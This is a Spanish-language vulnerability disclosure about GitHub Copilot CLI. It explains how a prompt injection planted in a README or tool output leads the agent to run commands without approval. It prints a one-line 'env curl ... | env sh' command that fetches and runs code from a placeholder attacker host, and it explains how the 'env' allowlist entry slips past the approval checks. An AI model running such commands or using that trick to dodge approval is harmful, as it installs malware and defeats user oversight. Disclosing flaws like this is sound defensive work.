La vulnerabilidad de GitHub Copilot CLI permite la ejecución de malware mediante inyección de comandos.

Resumen de la Vulnerabilidad

GitHub Copilot CLI contiene vulnerabilidades que exponen a los usuarios a la ejecución arbitraria de comandos de shell mediante inyección indirecta de prompts sin aprobación del usuario. El malware puede descargarse desde servidores externos y ejecutarse sin ninguna interacción del usuario más allá de la consulta inicial al Copilot CLI.

Cómo Funciona el Ataque

La cadena de ataque involucra:

• El usuario consulta GitHub Copilot CLI mientras explora un repositorio de código abierto
• Copilot encuentra una inyección de prompt almacenada en un archivo README del repositorio clonado (u otros vectores como resultados de búsqueda web, resultados de llamadas a herramientas MCP, salida de comandos de terminal)
• El comando malicioso evita los sistemas de aprobación con intervención humana

Evadiendo Mecanismos de Protección

GitHub Copilot utiliza un sistema de aprobación con intervención humana que requiere el consentimiento del usuario antes de ejecutar comandos potencialmente dañinos. Este sistema se activa a menos que:

• El usuario haya configurado explícitamente el comando para ejecutarse automáticamente
• El comando sea parte de una lista 'de solo lectura' codificada que se encuentra en el código fuente

Las verificaciones de acceso a URL externas requieren aprobación del usuario para comandos como curl, wget o la herramienta integrada de obtención web de Copilot. Sin embargo, los atacantes pueden evadir estas protecciones usando:

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

El comando env está en la lista codificada de solo lectura, por lo que se ejecuta automáticamente sin aprobación. Dado que curl y sh se pasan como argumentos a env, se analizan incorrectamente y el validador no los identifica como subcomandos. Esto evita las verificaciones de permisos de URL que dependen de detectar comandos como curl.

Respuesta de GitHub

GitHub respondió: "Hemos revisado su informe y validado sus hallazgos. Después de evaluar internamente el hallazgo, hemos determinado que es un problema conocido que no presenta un riesgo de seguridad significativo. Podríamos hacer que esta funcionalidad sea más estricta en el futuro, pero no tenemos nada que anunciar en este momento."

Alcance y Limitaciones

Las vulnerabilidades de análisis de comandos descritas son específicas de macOS. Sin embargo, GitHub Copilot exhibe vulnerabilidades adicionales que incluyen riesgos independientes del sistema operativo y riesgos específicos de Windows. Otras vulnerabilidades de análisis de comandos permiten la lectura y escritura arbitraria de archivos.